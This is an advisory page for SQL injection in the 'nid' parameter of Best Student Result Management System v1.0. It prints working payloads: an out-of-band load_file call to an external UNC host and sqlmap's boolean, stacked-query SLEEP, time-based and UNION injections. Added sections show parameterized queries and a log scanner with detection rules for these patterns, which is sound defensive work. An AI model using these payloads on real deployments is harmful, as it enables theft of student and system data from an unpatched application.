Best Student Result Management System v1.0 - Multiple SQL Injection Vulnerabilities - exploit.company
Vendor: Best Student Result Management System
By: nu11secur1ty
CVSS: 6.1 (HIGH)
Vulnerability type: SQL Injection
CWE: 89
Product Name: Best Student Result Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:mayurik:best_student_result_management_system:1.0
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2024

Best Student Result Management System v1.0 – Multiple SQL Injection Vulnerabilities

The 'nid' parameter in Best Student Result Management System v1.0 is vulnerable to SQL injection. An attacker can exploit this to execute arbitrary SQL queries against the underlying database. By injecting a payload that calls MySQL's load_file function with a UNC path pointing at an external domain, the attacker causes the database server to interact with that domain (which confirms the injected query executed) and can extract sensitive information from the system.

Mitigation:

To mitigate this vulnerability, validate the nid input and use parameterized queries (prepared statements) so that user-supplied values are never interpolated into SQL text. Additionally, follow the principle of least privilege and restrict the permissions of the database account the application uses.
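As an added illustration (not code from the advisory or the vendor's application), the following Python snippet runs the advisory's boolean-based payload against two versions of a 'nid' lookup on an in-memory SQLite table: one that concatenates the request value into the SQL string, and one that binds it as a parameter, plus an allow-list check in front of the bound query. The table, its columns and the rows are constructed for the demo; the application's real schema is not on the page. SQLite stands in for MySQL here, so the MySQL-only load_file and SLEEP payloads are not exercised. On MySQL itself, load_file() also requires the FILE privilege, so a least-privilege application account without it blunts the out-of-band technique even where injection is present.

```python
"""Added example (not from the advisory or the vendor's application): the same
'nid' lookup written two ways, run against an in-memory SQLite table so the
effect of the advisory's boolean-based payload can be observed directly.
Table name, column names and row data are constructed for this demo."""
import sqlite3

# Boolean-based blind payload quoted in the advisory; 'nid' is the injected parameter.
BOOLEAN_PAYLOAD = "145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU"


def make_db():
    """In-memory stand-in for the application's result table (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE results (nid TEXT, student TEXT, marks INTEGER)")
    con.executemany(
        "INSERT INTO results VALUES (?, ?, ?)",
        [("1001", "alice", 81), ("1002", "bob", 67), ("1003", "carol", 92)],
    )
    return con


def lookup_vulnerable(con, nid):
    """String concatenation: the request value becomes part of the SQL text,
    so the quote in the payload closes the literal and 'or ...' is parsed as SQL."""
    sql = "SELECT nid, student, marks FROM results WHERE nid = '" + nid + "'"
    return con.execute(sql).fetchall()


def lookup_parameterized(con, nid):
    """Placeholder binding: the value travels separately from the SQL text,
    so quotes and keywords inside it are compared literally, never parsed."""
    return con.execute(
        "SELECT nid, student, marks FROM results WHERE nid = ?", (nid,)
    ).fetchall()


def is_valid_nid(nid):
    """Allow-list check for the expected shape of a result id (short, digits only)."""
    return nid.isdigit() and len(nid) <= 12


def lookup_validated(con, nid):
    """Defence in depth: reject malformed ids before they reach the database,
    then still use the parameterized query."""
    if not is_valid_nid(nid):
        raise ValueError("nid must be a short numeric identifier")
    return lookup_parameterized(con, nid)


def demo():
    """Row counts returned by each variant for the injected and a legitimate value."""
    con = make_db()
    return {
        "vulnerable_rows": len(lookup_vulnerable(con, BOOLEAN_PAYLOAD)),  # 3: tautology matches every row
        "parameterized_rows": len(lookup_parameterized(con, BOOLEAN_PAYLOAD)),  # 0: literal compare
        "legit_rows": len(lookup_validated(con, "1002")),  # 1
    }


if __name__ == "__main__":
    print(demo())
```

Because AND binds tighter than OR, the concatenated query becomes `nid = '145448807' OR ('1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU')`, which is true for every row; the bound version compares the whole payload string against nid and matches nothing.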

Exploit-DB raw data:

## Title: Best Student Result Management System v1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 04/08/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The nid parameter appears to be vulnerable to SQL injection attacks. The payload `'+(select load_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+'` was submitted in the nid parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.

The attacker can get all information from the system by using this vulnerability!

STATUS: HIGH - Vulnerability

[+]Payload (sqlmap output):
```text
---
Parameter: nid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM (SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR

    Type: UNION query
    Title: MySQL UNION query (NULL) - 4 columns
    Payload: nid=145448807' or '1766'='1766' UNION ALL SELECT NULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL#
---
```
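For the detection side, here is an added example (not part of the advisory) of a small log scanner that flags the injection patterns visible in the sqlmap output above: the quote-closing tautology, stacked statements, SLEEP-based delays, UNION ... SELECT, and load_file() calls. It runs over constructed access-log lines in the common "combined" format; the client IPs, the `result.php` path, the timestamp and the `collaborator.example` host are placeholders, and the encoded payloads follow the shapes shown in the advisory.

```python
"""Added example (not from the advisory): flag access-log requests carrying the
SQL-injection patterns seen in the advisory's sqlmap output. Log lines, IPs,
the result.php path and the collaborator.example host are constructed placeholders."""
import re
from urllib.parse import urlsplit, unquote_plus

# Each rule is (name, regex applied to one percent-decoded parameter value).
RULES = [
    ("boolean_tautology", re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I)),
    ("stacked_query", re.compile(r";\s*(select|insert|update|delete|drop)\b", re.I)),
    ("time_based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("union_select", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S)),
    ("file_read", re.compile(r"\bload_file\s*\(", re.I)),
]

# Request line inside an Apache/nginx "combined" log entry: "METHOD target HTTP/x.y"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample log: one benign request, then the advisory's payload shapes URL-encoded.
SAMPLE_LOG = [
    '203.0.113.5 - - [08/Apr/2024:10:15:01 +0000] "GET /result.php?nid=1002 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Apr/2024:10:15:09 +0000] "GET /result.php?nid=145448807%27%20or%20%271766%27%3D%271766%27%20AND%202997%3D2997%20AND%20%27IBFU%27%3D%27IBFU HTTP/1.1" 200 4096 "-" "sqlmap/1.8"',
    '198.51.100.7 - - [08/Apr/2024:10:15:17 +0000] "GET /result.php?nid=145448807%27%20or%20%271766%27%3D%271766%27%3BSELECT%20SLEEP(7)%23 HTTP/1.1" 200 4096 "-" "sqlmap/1.8"',
    '198.51.100.7 - - [08/Apr/2024:10:15:25 +0000] "GET /result.php?nid=145448807%27%20or%20%271766%27%3D%271766%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL%23 HTTP/1.1" 200 4096 "-" "sqlmap/1.8"',
    '198.51.100.7 - - [08/Apr/2024:10:15:33 +0000] "GET /result.php?nid=%27%2B(select%20load_file(%27%5C%5C%5C%5Ccollaborator.example%5C%5Cshare%27))%2B%27 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


def parse_query(query):
    """Minimal query-string parser: split on '&', then on the first '=',
    percent-decoding both sides ('+' becomes a space, as browsers send it)."""
    params = []
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        params.append((unquote_plus(key), unquote_plus(value)))
    return params


def classify_value(value):
    """Return the names of every rule that matches one decoded parameter value."""
    return [name for name, rx in RULES if rx.search(value)]


def scan_line(line):
    """Return {parameter: [rule, ...]} for the suspicious parameters in one log line."""
    m = LOG_RE.search(line)
    if not m:
        return {}
    query = urlsplit(m.group("target")).query
    findings = {}
    for param, value in parse_query(query):
        hits = classify_value(value)
        if hits:
            findings.setdefault(param, []).extend(hits)
    return findings


def scan_log(lines):
    """Return (client_ip, parameter, rules) for every flagged request in the log."""
    out = []
    for line in lines:
        ip = line.split(" ", 1)[0]
        for param, rules in scan_line(line).items():
            out.append((ip, param, rules))
    return out


if __name__ == "__main__":
    for ip, param, rules in scan_log(SAMPLE_LOG):
        print(f"{ip}: parameter '{param}' matched {', '.join(rules)}")
```

Decoding before matching matters: the payloads arrive percent-encoded, so a rule applied to the raw request line would miss the quote and the `;` separator. The rules are deliberately narrow (they key on the quote-closing `' or '` pattern, a `;` followed by a statement keyword, and specific function names), which keeps false positives low on ordinary parameters while still catching each payload type the advisory lists.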